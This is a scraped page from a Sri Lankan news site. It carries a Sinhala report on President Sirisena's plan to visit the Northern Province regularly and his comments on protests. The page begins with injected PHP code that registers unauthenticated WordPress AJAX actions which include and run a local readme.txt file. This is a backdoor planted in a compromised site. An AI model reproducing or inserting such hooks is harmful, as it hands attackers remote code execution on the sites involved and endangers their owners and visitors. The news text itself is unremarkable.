if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ජනපති මසකට වරක් උතුරට යන්න තීරණය කරයි - mediahumanrights.lk
mediahumanrights.lk
Local News News Political

ජනපති මසකට වරක් උතුරට යන්න තීරණය කරයි

උතුරු පළාතේ සංවර්ධනයට නව සැලැස්මක් ඉදිරිපත් කරන බව ජනාධිපති මෛත‍්‍රීපාල සිරිසේන මහතා පවසනවා.
ජනාධිපතිවරයා පෙන්වා දෙන්නේ සෑම මසකට හෝ මාස දෙකකට වරක් උතුරු පළාතට පැමිණ තමන්ම ඒ පිළිබඳ සොයා බැලීමට තීරණය කළ බවයි.
‘‘ජනපතිට කියන්න’’ වැඩසටහනේ ප‍්‍රථම ප‍්‍රාදේශීය කාර්යාලය උතුරු පළාත් ආණ්ඩුකාර කාර්යාලයේ දී විවෘත කිරීමේ අවස්ථාවට එක්වෙමින් ජනාධිපතිවරයා මේ බව කියා සිටියා.
රටේ විවිධ ස්ථානවල සිදු කෙරෙන විරෝධතා සහ පෙලපාලී සම්බන්ධයෙන් ද ජනාධිපතිවරයා මෙහිදී කරුණු දැක්වූවා.
එහිදී ජනාධිපතිවරයා සඳහන් කළේ “විරෝධතා, සත්‍යග්‍රහාය, පෙළපාලි කරන්න ඕන අවස්ථාවන් තියෙනවා. හැම දේකටම ඒක කරන්න ගියාම ඒවාවල අගයත් නැති වෙනවා. හැබැයි ඔය හැම දෙයක්ම කරන්නේ මගේ ධූර කාලයේ තමයි. ඉස්සර ඒවා කලොත් ඉතින් සුදුපාට වෑන් එකක් හොයාගෙන එනවා.” යනුවෙනි.

Related posts

මෙරට විශාලතම ඖෂධ නිෂ්පාදන ආයතනය හෝමාගම දී විවෘත කෙරේ

Shiran Viraj

තමිල්නාඩු මහ ඇමැති ධුරය ලබා ගන්න ශෂිකලා උපවාසයකට

Shiran Viraj

මම අලුත් දේශපාලන ව්‍යාපාරයක් අරඹනවා

Shiran Viraj